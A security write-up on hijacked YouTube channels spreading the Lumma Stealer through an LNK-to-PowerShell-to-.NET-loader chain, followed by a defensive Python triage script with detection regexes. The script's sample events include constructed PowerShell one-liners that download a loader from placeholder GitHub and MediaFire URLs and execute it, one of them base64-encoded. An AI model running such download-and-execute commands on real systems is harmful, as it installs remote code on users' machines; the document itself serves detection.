Threat actors have been using compromised YouTube channels to distribute the Lumma Stealer malware [1]. The method resembles an earlier campaign that used AI-generated tutorial videos on installing cracked, unlicensed software [1]. By hosting the payloads on public file-hosting platforms such as GitHub and MediaFire [1], the attackers evade web filters that would block a purpose-built malicious domain. The YouTube videos promote cracked applications and carry the malicious URLs in their descriptions [1].

Description

The attack begins with the compromise of YouTube accounts, which are then used to upload videos whose descriptions contain malicious URLs [1]. The videos entice viewers into downloading a ZIP archive [1]. Inside the archive is an LNK shortcut that invokes PowerShell to download a .NET executable from a GitHub repository [1]; this new .NET loader in turn fetches the final payload, Lumma Stealer [1] [2], an information stealer that targets sensitive data such as user credentials and browser data. The loader incorporates various techniques to evade detection by security tooling.
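Because the final exfiltration in this campaign is encrypted, host-side process telemetry is the most reliable place to catch the chain: a shortcut double-clicked from Explorer spawns PowerShell with a download cradle pointing at GitHub or MediaFire, often with hidden-window and policy-bypass flags or an encoded command. The triage script below is an added example, not Fortinet's or Dark Reading's code. It assumes a Sysmon-style process-creation event shape (ParentImage, Image, CommandLine as JSON lines); the sample events, hosting URLs, indicator names and weights are constructed here for illustration, and it goes slightly beyond the text by also decoding -EncodedCommand payloads so an obfuscated one-liner does not slip past the string checks.

```python
"""Triage process-creation events for the LNK -> PowerShell -> hosted .NET loader chain.

Added example (not Fortinet's or Dark Reading's code). The JSON-lines event shape
(ParentImage / Image / CommandLine, Sysmon Event ID 1 style), the sample events and
the indicator names are constructed here for illustration.
"""
import base64
import json
import re

# Download primitives an LNK-launched PowerShell one-liner typically relies on.
DOWNLOAD_RE = re.compile(
    r"(Invoke-WebRequest|\biwr\b|\bcurl\b|\bwget\b|DownloadFile|DownloadString|"
    r"Start-BitsTransfer|Invoke-RestMethod|\birm\b)", re.I)
# The public hosting platforms the write-up names as loader delivery points.
HOSTING_RE = re.compile(
    r"https?://(?:[\w.-]+\.)?(?:github\.com|githubusercontent\.com|mediafire\.com)/[^\s'\")]*", re.I)
PAYLOAD_EXT_RE = re.compile(r"\.(?:exe|dll|zip|ps1|bat|scr)\b", re.I)
# Flags that hide the window or disable profile/policy; benign admin scripts use some of them too.
EVASION_FLAGS_RE = re.compile(
    r"(?:^|\s)-(?:w(?:indowstyle)?\s+hidden|nop(?:rofile)?|ep\s+bypass|"
    r"executionpolicy\s+bypass|noni(?:nteractive)?)\b", re.I)
# -EncodedCommand and its common prefixes (PowerShell accepts any unambiguous prefix).
ENCODED_RE = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)

# Illustrative weights: explorer parentage alone is benign, a hosted payload download is not.
WEIGHTS = {"launched_from_explorer": 1, "download_cradle": 2, "public_hosting_url": 2,
           "hosted_payload_extension": 2, "evasion_flags": 1, "encoded_command": 2}


def decode_encoded_command(cmdline):
    """Return the script hidden behind -EncodedCommand (base64 of UTF-16LE), or '' if absent/invalid."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def indicators(event):
    """Return the indicator names one process-creation event matches (empty if not PowerShell)."""
    parent = event.get("ParentImage", "").lower()
    image = event.get("Image", "").lower()
    cmd = event.get("CommandLine", "")
    if not image.endswith(("powershell.exe", "pwsh.exe")):
        return []
    # Inspect the visible command line plus whatever an encoded command hides.
    text = cmd + "\n" + decode_encoded_command(cmd)
    hits = []
    if parent.endswith("explorer.exe"):       # what a double-clicked .lnk looks like in telemetry
        hits.append("launched_from_explorer")
    if DOWNLOAD_RE.search(text):
        hits.append("download_cradle")
    url = HOSTING_RE.search(text)
    if url:
        hits.append("public_hosting_url")
        if PAYLOAD_EXT_RE.search(url.group(0)):
            hits.append("hosted_payload_extension")
    if EVASION_FLAGS_RE.search(cmd):
        hits.append("evasion_flags")
    if ENCODED_RE.search(cmd):
        hits.append("encoded_command")
    return hits


def triage(log_lines, threshold=5):
    """Parse JSON-lines events; return (EventId, score, hits) for events scoring >= threshold."""
    findings = []
    for line in log_lines:
        if not line.strip():
            continue
        event = json.loads(line)
        hits = indicators(event)
        score = sum(WEIGHTS[h] for h in hits)
        if score >= threshold:
            findings.append((event.get("EventId"), score, hits))
    return findings


# Constructed sample events: two mimic the chain described above, two are benign admin activity.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
HIDDEN_SCRIPT = ("(New-Object Net.WebClient).DownloadFile("
                 "'https://www.mediafire.com/file/abc123/setup.zip','C:\\Users\\Public\\setup.zip')")
ENCODED_SAMPLE = base64.b64encode(HIDDEN_SCRIPT.encode("utf-16-le")).decode()  # constructed fixture
SAMPLE_EVENTS = [
    {"EventId": 1, "ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell.exe -w hidden -nop -ep bypass -c \"iwr "
                    "https://github.com/example-user/example-repo/raw/main/loader.exe "
                    "-OutFile $env:TEMP\\loader.exe; Start-Process $env:TEMP\\loader.exe\""},
    {"EventId": 2, "ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": f"powershell.exe -nop -w hidden -enc {ENCODED_SAMPLE}"},
    {"EventId": 3, "ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": r"powershell.exe -nop -File C:\Users\alice\scripts\backup.ps1"},
    {"EventId": 4, "ParentImage": r"C:\Windows\System32\cmd.exe", "Image": PS,
     "CommandLine": "powershell.exe -Command Get-Process | Sort-Object CPU"},
]
SAMPLE_LOG = [json.dumps(e) for e in SAMPLE_EVENTS]

if __name__ == "__main__":
    for event_id, score, hits in triage(SAMPLE_LOG):
        print(f"event {event_id}: score {score}: {', '.join(hits)}")
```

Run stand-alone, the script flags events 1 and 2 and leaves the two benign entries alone. The weights are deliberately coarse: a legitimate installer script that pulls a .ps1 from GitHub will also score high, so in production the platform and extension checks should be tuned against your own baseline rather than used as a hard block.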

Once launched, the stealer establishes communication with a command-and-control (C2) server and sends the stolen data back to the attackers [1]. The campaign has updated its exfiltration channel to use HTTPS, making the traffic harder to distinguish from legitimate encrypted connections and defeating plain-text network inspection [1]. In light of these developments, Fortinet advises caution when downloading applications promoted on YouTube or other platforms [1]. Basic security awareness training for employees is also recommended, since it reduces the likelihood of such files being downloaded in corporate environments.

Conclusion

Using hijacked YouTube channels to distribute malware poses a significant threat to users' sensitive information. Individuals should be cautious when downloading applications promoted on YouTube or other platforms [1], and organizations can reduce the risk of malicious downloads in corporate environments through basic security awareness training. Because threat actors keep refining their delivery and evasion techniques, individuals and organizations alike need to stay vigilant and maintain appropriate security controls against attacks of this kind.

References

[1] https://www.darkreading.com/cyberattacks-data-breaches/weaponized-youtube-channels-spread-lumma-stealer
[2] https://thehackernews.com/2024/01/beware-youtube-videos-promoting-cracked.html